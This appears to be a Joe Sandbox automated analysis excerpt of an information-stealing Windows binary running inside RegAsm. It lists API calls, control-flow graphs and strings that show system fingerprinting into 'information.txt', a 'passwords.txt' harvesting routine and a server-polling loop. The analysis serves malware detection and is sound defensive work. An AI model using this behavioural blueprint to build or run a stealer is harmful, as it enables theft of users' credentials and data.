call 4107c9 call 410776 call 410c9c call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410c69 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410d69 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410dd2 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4110ab call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410e59 call 410810 call 4107c9 call 410776 * 2 call 410e59 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410935 lstrlenA call 410935 call 41070b call 4010b1 call 415865 call 410776 * 2 call 401061
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00415A37
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410A20: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004275CB), ref: 00410A2E
                                                • Part of subcall function 00410A20: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A35
                                                • Part of subcall function 00410A20: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A41
                                                • Part of subcall function 00410A20: wsprintfA.USER32 ref: 00410A6C
                                                • Part of subcall function 004111FD: memset.MSVCRT ref: 00411223
                                                • Part of subcall function 004111FD: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004275CB,?,?,00000000), ref: 0041123F
                                                • Part of subcall function 004111FD: RegQueryValueExA.KERNEL32(004275CB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041125E
                                                • Part of subcall function 004111FD: CharToOemA.USER32(?,?), ref: 0041127B
                                                • Part of subcall function 0041128A: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041129B
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004112C5: _EH_prolog.MSVCRT ref: 004112CA
                                                • Part of subcall function 004112C5: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004112ED
                                                • Part of subcall function 004112C5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041131F
                                                • Part of subcall function 004112C5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411362
                                                • Part of subcall function 004112C5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00411369
                                              • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00427778,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042776C,00000000), ref: 00415D50
                                                • Part of subcall function 00411DE9: OpenProcess.KERNEL32(00000410,00000000,`]A), ref: 00411E01
                                                • Part of subcall function 00411DE9: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411E1C
                                                • Part of subcall function 00411DE9: CloseHandle.KERNEL32(00000000), ref: 00411E23
                                                • Part of subcall function 00411433: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory), ref: 00411447
                                                • Part of subcall function 00411433: HeapAlloc.KERNEL32(00000000,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041144E
                                                • Part of subcall function 00411564: _EH_prolog.MSVCRT ref: 00411569
                                                • Part of subcall function 00411564: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 00411581
                                                • Part of subcall function 00411564: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 00411592
                                                • Part of subcall function 00411564: CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?), ref: 004115AC
                                                • Part of subcall function 00411564: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004115E2
                                                • Part of subcall function 00411564: VariantInit.OLEAUT32(?), ref: 0041163D
                                                • Part of subcall function 0041170D: _EH_prolog.MSVCRT ref: 00411712
                                                • Part of subcall function 0041170D: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?,00000000), ref: 0041172A
                                                • Part of subcall function 0041170D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 0041173B
                                                • Part of subcall function 0041170D: CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?), ref: 00411755
                                                • Part of subcall function 0041170D: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041178B
                                                • Part of subcall function 0041170D: VariantInit.OLEAUT32(?), ref: 004117DE
                                                • Part of subcall function 004109E5: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00415FEC,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000), ref: 004109F1
                                                • Part of subcall function 004109E5: HeapAlloc.KERNEL32(00000000,?,?,00415FEC,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ), ref: 004109F8
                                                • Part of subcall function 004109E5: GetComputerNameA.KERNEL32(00000000,00000000), ref: 00410A0C
                                                • Part of subcall function 004109B3: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041872B,00427716), ref: 004109BF
                                                • Part of subcall function 004109B3: HeapAlloc.KERNEL32(00000000,?,?,?,0041872B,00427716), ref: 004109C6
                                                • Part of subcall function 004109B3: GetUserNameA.ADVAPI32(00000000,?), ref: 004109DA
                                                • Part of subcall function 00411188: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 0041119D
                                                • Part of subcall function 00411188: GetDeviceCaps.GDI32(00000000,00000008), ref: 004111A8
                                                • Part of subcall function 00411188: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004111B3
                                                • Part of subcall function 00411188: ReleaseDC.USER32(00000000,00000000), ref: 004111BE
                                                • Part of subcall function 00411188: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?), ref: 004111CA
                                                • Part of subcall function 00411188: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?,00000000), ref: 004111D1
                                                • Part of subcall function 00411188: wsprintfA.USER32 ref: 004111E3
                                                • Part of subcall function 00410ACD: _EH_prolog.MSVCRT ref: 00410AD2
                                                • Part of subcall function 00410ACD: GetKeyboardLayoutList.USER32(00000000,00000000,00427307,00000001,?,00000000), ref: 00410B04
                                                • Part of subcall function 00410ACD: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 00410B12
                                                • Part of subcall function 00410ACD: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 00410B1D
                                                • Part of subcall function 00410ACD: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 00410B47
                                                • Part of subcall function 00410ACD: LocalFree.KERNEL32(?), ref: 00410BEB
                                                • Part of subcall function 00410A7A: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ), ref: 00410A8B
                                                • Part of subcall function 00410A7A: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410A92
                                                • Part of subcall function 00410A7A: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410AA1
                                                • Part of subcall function 00410A7A: wsprintfA.USER32 ref: 00410ABF
                                                • Part of subcall function 00410C00: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C), ref: 00410C14
                                                • Part of subcall function 00410C00: HeapAlloc.KERNEL32(00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C,00000000,?), ref: 00410C1B
                                                • Part of subcall function 00410C00: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 00410C39
                                                • Part of subcall function 00410C00: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 00410C55
                                                • Part of subcall function 00410C9C: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410CEF
                                                • Part of subcall function 00410C9C: wsprintfA.USER32 ref: 00410D35
                                                • Part of subcall function 00410C69: GetSystemInfo.KERNEL32(00000000), ref: 00410C76
                                                • Part of subcall function 00410C69: wsprintfA.USER32 ref: 00410C8B
                                                • Part of subcall function 00410D69: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784), ref: 00410D77
                                                • Part of subcall function 00410D69: HeapAlloc.KERNEL32(00000000), ref: 00410D7E
                                                • Part of subcall function 00410D69: GlobalMemoryStatusEx.KERNEL32 ref: 00410D9E
                                                • Part of subcall function 00410D69: wsprintfA.USER32 ref: 00410DC4
                                                • Part of subcall function 00410DD2: _EH_prolog.MSVCRT ref: 00410DD7
                                                • Part of subcall function 00410DD2: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410E3F
                                                • Part of subcall function 004110AB: _EH_prolog.MSVCRT ref: 004110B0
                                                • Part of subcall function 004110AB: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004110EB
                                                • Part of subcall function 004110AB: Process32First.KERNEL32(00000000,00000128), ref: 004110FC
                                                • Part of subcall function 004110AB: Process32Next.KERNEL32(?,00000128), ref: 00411164
                                                • Part of subcall function 004110AB: CloseHandle.KERNEL32(?,?,00000000), ref: 00411171
                                                • Part of subcall function 00410E59: _EH_prolog.MSVCRT ref: 00410E5E
                                                • Part of subcall function 00410E59: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042731F,00000001,00000000), ref: 00410EA6
                                                • Part of subcall function 00410E59: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410EF0
                                                • Part of subcall function 00410E59: wsprintfA.USER32 ref: 00410F1A
                                                • Part of subcall function 00410E59: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410F37
                                                • Part of subcall function 00410E59: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410F61
                                                • Part of subcall function 00410E59: lstrlenA.KERNEL32(?), ref: 00410F76
                                                • Part of subcall function 00410E59: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00427348), ref: 00410FF6
                                              • lstrlenA.KERNEL32(00000000,00000000,?,004278C0,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004278B0), ref: 004167A8
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                              • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                              • API String ID: 722754166-3257470747
                                              • Opcode ID: bfa6ec14baec352ab957f2e9b56a43ba5cc364f00860c0286a06aec8a3f4c335
                                              • Instruction ID: d5ba8c6de4fda0102b2d8ee6596fa508dd31ea5481e8040501ad09f872d8dabc
                                              • Opcode Fuzzy Hash: bfa6ec14baec352ab957f2e9b56a43ba5cc364f00860c0286a06aec8a3f4c335
                                              • Instruction Fuzzy Hash: 45920D71C05149EDDB05E7E5C956AEEBBB85F28348F10419EA142731C2DFB82BC8CAB5

                                              Control-flow Graph

                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040CF06
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00426BF8,?,?,?,00426BF2,?,00000000), ref: 0040CFFE
                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D05F
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040D066
                                              • lstrlenA.KERNEL32(00000000,00000000), ref: 0040D0F6
                                              • lstrcat.KERNEL32(00000000), ref: 0040D10D
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040D11F
                                              • lstrcat.KERNEL32(00000000,00426BFC), ref: 0040D12D
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040D13F
                                              • lstrcat.KERNEL32(00000000,00426C00), ref: 0040D14D
                                              • lstrcat.KERNEL32(00000000), ref: 0040D15C
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040D16E
                                              • lstrcat.KERNEL32(00000000,00426C04), ref: 0040D17C
                                              • lstrcat.KERNEL32(00000000), ref: 0040D18B
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040D19D
                                              • lstrcat.KERNEL32(00000000,00426C08), ref: 0040D1AB
                                              • lstrcat.KERNEL32(00000000), ref: 0040D1BA
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040D1CC
                                              • lstrcat.KERNEL32(00000000,00426C0C), ref: 0040D1DA
                                              • lstrcat.KERNEL32(00000000,00426C10), ref: 0040D1E8
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D21C
                                              • memset.MSVCRT ref: 0040D26F
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D29C
                                                • Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
                                                • Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
                                                • Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
                                                • Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                              • String ID: passwords.txt
                                              • API String ID: 3298853120-347816968
                                              • Opcode ID: db8ddd7744e31c2ba4826c6f91dc94e958a462fcb524ac0ae03073d557bcf216
                                              • Instruction ID: 1272b24bb8ff4ed9934adf0ead2cd7faa73ad4671de3ebcdde783529059c2fdd
                                              • Opcode Fuzzy Hash: db8ddd7744e31c2ba4826c6f91dc94e958a462fcb524ac0ae03073d557bcf216
                                              • Instruction Fuzzy Hash: 42C18D71800149EFDF05EBE1DD1AAEEBB75AF19304F10401AF511B21E2DBB81A88CF65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1708 414d3a-414df3 _EH_prolog call 4142d8 call 41077f * 3 call 41070b * 6 1729 414df7-414dfe call 40227f 1708->1729 1732 414e92-414f13 call 4020f9 call 402113 call 4010b1 call 413e88 call 4107c9 call 410776 call 410935 StrCmpCA 1729->1732 1733 414e04-414e8d call 4020f9 call 4107c9 call 410776 call 40212d call 410742 call 4010b1 call 413daa call 4107c9 1729->1733 1763 414f15-414f57 call 40212d call 410742 call 4010b1 call 413daa 1732->1763 1764 414f7e-414f94 call 410935 StrCmpCA 1732->1764 1769 414f75-414f79 call 410776 1733->1769 1789 414f5c-414f6f call 4107c9 1763->1789 1772 415789-4157e8 call 4107c9 call 40212d call 4107c9 call 410776 call 402286 call 4107c9 call 410776 call 414005 1764->1772 1773 414f9a-414fa1 call 402282 1764->1773 1769->1764 1863 4157ed-415864 call 410776 * 6 call 414315 call 401061 1772->1863 1782 414fa7-414fae call 40227f 1773->1782 1783 41512b-415141 call 410935 StrCmpCA 1773->1783 1795 414fb4-41503a call 402147 call 4107c9 call 410776 call 40217b call 402147 call 4010b1 call 413daa call 4107c9 1782->1795 1796 41503f-4150c0 call 402147 call 402161 call 4010b1 call 413e88 call 4107c9 call 410776 call 410935 StrCmpCA 1782->1796 1797 415744-415784 call 4107c9 call 40217b call 4107c9 call 410776 call 4022a0 1783->1797 1798 415147-41514e call 40227f 1783->1798 1789->1769 1936 415122-415126 call 410776 1795->1936 1796->1783 1923 4150c2-41511c call 40217b call 410742 call 4010b1 call 413daa call 4107c9 1796->1923 1871 415694-4156b8 call 4107c9 call 410776 call 414005 1797->1871 1811 415154-41515b call 40227f 1798->1811 1812 4152d8-4152ee call 410935 StrCmpCA 1798->1812 1831 415161-4151e7 call 402195 call 4107c9 call 410776 call 4021c9 call 402195 call 4010b1 call 413daa call 4107c9 1811->1831 1832 4151ec-41526d call 402195 call 4021af call 4010b1 call 413e88 call 4107c9 call 410776 call 410935 StrCmpCA 1811->1832 1833 4152f4-4152fb call 40227f 1812->1833 1834 4156ff-41573f call 4107c9 call 4021c9 call 4107c9 call 410776 call 4022ba 1812->1834 2000 4152cf-4152d3 call 410776 1831->2000 1832->1812 1986 41526f-4152c9 call 4021c9 call 410742 call 4010b1 call 413daa call 4107c9 1832->1986 1857 415301-415308 call 40227f 1833->1857 1858 415485-41549b call 410935 StrCmpCA 1833->1858 1834->1871 1883 415399-41541a call 4021e3 call 4021fd call 4010b1 call 413e88 call 4107c9 call 410776 call 410935 StrCmpCA 1857->1883 1884 41530e-415394 call 4021e3 call 4107c9 call 410776 call 402217 call 4021e3 call 4010b1 call 413daa call 4107c9 1857->1884 1885 4154a1-4154a8 call 40227f 1858->1885 1886 4156bd-4156fd call 4107c9 call 402217 call 4107c9 call 410776 call 4022d4 1858->1886 1871->1863 1883->1858 2036 41541c-415476 call 402217 call 410742 call 4010b1 call 413daa call 4107c9 1883->2036 2044 41547c-415480 call 410776 1884->2044 1919 41562c-415642 call 410935 StrCmpCA 1885->1919 1920 4154ae-4154b5 call 40227f 1885->1920 1886->1871 1949 415654-415690 call 4107c9 call 402265 call 4107c9 call 410776 call 4022ee 1919->1949 1950 415644-41564f Sleep 1919->1950 1951 415546-4155c7 call 402231 call 40224b call 4010b1 call 413e88 call 4107c9 call 410776 call 410935 StrCmpCA 1920->1951 1952 4154bb-415541 call 402231 call 4107c9 call 410776 call 402265 call 402231 call 4010b1 call 413daa call 4107c9 1920->1952 1923->1936 1936->1783 1949->1871 1950->1729 1951->1919 2062 4155c9-415620 call 402265 call 410742 call 4010b1 call 413daa call 4107c9 1951->2062 2067 415623-415627 call 410776 1952->2067 1986->2000 2000->1812 2036->2044 2044->1858 2062->2067 2067->1919
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00414D3F
                                                • Part of subcall function 004142D8: _EH_prolog.MSVCRT ref: 004142DD
                                                • Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
                                                • Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414F0B
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414F8C
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00413DAA: _EH_prolog.MSVCRT ref: 00413DAF
                                                • Part of subcall function 00413DAA: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E0D
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004150B8
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415139
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415265
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004152E6
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415412
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415493
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004155BF
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041563A
                                              • Sleep.KERNEL32(0000EA60), ref: 00415649
                                                • Part of subcall function 00413E88: _EH_prolog.MSVCRT ref: 00413E8D
                                                • Part of subcall function 00413E88: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
                                                • Part of subcall function 00413E88: lstrlenA.KERNEL32(00000000), ref: 00413F26
                                                • Part of subcall function 00413E88: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F4D
                                                • Part of subcall function 00413E88: lstrlenA.KERNEL32(00000000), ref: 00413F62
                                                • Part of subcall function 00413E88: lstrlenA.KERNEL32(00000000), ref: 00413F7D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpylstrlen$Sleep
                                              • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                              • API String ID: 1345713276-3681523784
                                              • Opcode ID: 7ee7a4225705314ce0bb3d68cd9a80c858fd4d736d994762bd60cc71e67fd3fc
                                              • Instruction ID: ee0954d6909aaf42f580de9b3dc84f2d6efd8a6f2c2388120a1c306aed01b760
                                              • Opcode Fuzzy Hash: 7ee7a4225705314ce0bb3d68cd9a80c858fd4d736d994762bd60cc71e67fd3fc
                                              • Instruction Fuzzy Hash: E6627670D05248EADB01EBE5CA4ABDE7BB89F15304F10419EF455B31C2DBB85B88CB66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
